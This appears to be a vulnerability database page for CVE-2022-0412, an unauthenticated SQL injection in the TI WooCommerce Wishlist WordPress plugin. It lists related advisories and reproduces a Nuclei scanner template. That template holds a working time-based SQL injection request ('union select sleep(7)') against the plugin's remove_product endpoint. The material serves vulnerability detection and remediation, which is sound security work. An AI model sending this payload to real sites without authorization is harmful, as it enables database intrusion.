| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2022-0412 | 28 Feb 202209:15 | – | attackerkb | |
| CVE-2022-0412 | 4 Jul 202310:30 | – | circl | |
| WordPress SQL注入漏洞 | 28 Feb 202200:00 | – | cnnvd | |
| WordPress TI WooCommerce Wishlist plugin SQL injection vulnerability | 2 Mar 202200:00 | – | cnvd | |
| CVE-2022-0412 | 28 Feb 202209:06 | – | cve | |
| CVE-2022-0412 TI WooCommerce Wishlist < 1.40.1 - Unauthenticated Blind SQL Injection | 28 Feb 202209:06 | – | cvelist | |
| CVE-2022-0412 | 28 Feb 202209:15 | – | nvd | |
| WordPress TI WooCommerce Wishlist Plugin < 1.40.1 SQLi Vulnerability | 14 Mar 202200:00 | – | openvas | |
| CVE-2022-0412 | 28 Feb 202209:15 | – | osv | |
| WordPress TI WooCommerce Wishlist premium plugin <= 1.40.0 - Unauthenticated Blind SQL Injection (SQLi) vulnerability | 31 Jan 202200:00 | – | patchstack |
id: CVE-2022-0412
info:
name: WordPress TI WooCommerce Wishlist <1.40.1 - SQL Injection
author: edoardottt
severity: critical
description: |
WordPress TI WooCommerce Wishlist plugin before 1.40.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint.
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database.
remediation: |
Update to the latest version of the TI WooCommerce Wishlist plugin (1.40.1 or higher).
reference:
- https://wpscan.com/vulnerability/e984ba11-abeb-4ed4-9dad-0bfd539a9682
- https://wordpress.org/plugins/ti-woocommerce-wishlist/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0412
- https://plugins.trac.wordpress.org/changeset/2668899
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0412
cwe-id: CWE-89
epss-score: 0.7458
epss-percentile: 0.99436
cpe: cpe:2.3:a:templateinvaders:ti_woocommerce_wishlist:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: templateinvaders
product: ti_woocommerce_wishlist
framework: wordpress
tags: time-based-sqli,cve2022,cve,sqli,ti-woocommerce-wishlist,wpscan,woocommerce,wordpress,wp-plugin,wp,templateinvaders,vuln
http:
- raw:
- |
@timeout: 15s
GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=7'
- type: word
part: body
words:
- 'Product not found'
- type: status
status:
- 400
# digest: 4a0a0047304502206440aeeb36aa054e4a836786f7735317a740398a66cde8a3d7ef504187e06d9e0221008f9f1b13ae42e411e3a49cf42cc27693fa11fbbb0f752608a8c14e2bd9a41e71:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation